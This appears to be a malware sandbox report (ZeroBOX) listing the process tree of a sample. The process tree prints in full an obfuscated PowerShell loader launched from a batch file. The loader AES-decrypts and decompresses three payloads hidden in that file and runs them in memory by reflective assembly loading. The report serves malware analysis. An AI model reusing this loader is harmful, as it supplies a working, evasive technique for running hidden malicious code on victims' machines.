| ZeroBOX

Behavioral Analysis

Process tree

  • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\bin.ps1

    2552
    • cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\TfTatticasupdater.bat" "

      2704
      • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ChVO1+OS14WL1QUy/flynTXrlSOhgp9SBTxTD/evU9c='); $aes_var.IV=[System.Convert]::FromBase64String('DrXQO2PcC7l+n4nK5t3A3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vmUPQ=New-Object System.IO.MemoryStream(,$param_var); $BuLGM=New-Object System.IO.MemoryStream; $WgbCU=New-Object System.IO.Compression.GZipStream($vmUPQ, [IO.Compression.CompressionMode]::Decompress); $WgbCU.CopyTo($BuLGM); $WgbCU.Dispose(); $vmUPQ.Dispose(); $BuLGM.Dispose(); $BuLGM.ToArray();}function execute_function($param_var,$param2_var){ $FCyIR=[System.Reflection.Assembly]::Load([byte[]]$param_var); $KsCoS=$FCyIR.EntryPoint; $KsCoS.Invoke($null, $param2_var);}$wrlhT = 'C:\Users\test22\AppData\Local\Temp\TfTatticasupdater.bat';$host.UI.RawUI.WindowTitle = $wrlhT;$oaQMV=[System.IO.File]::ReadAllText($wrlhT).Split([Environment]::NewLine);foreach ($eJDDT in $oaQMV) { if ($eJDDT.StartsWith('nsiwjFslDvZfvwXwOXvp')) { $DoMTi=$eJDDT.Substring(20); break; }}$payloads_var=[string[]]$DoMTi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

        2788
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

        2824

Process contents

No process loaded Click on a process in the tree above to load its data.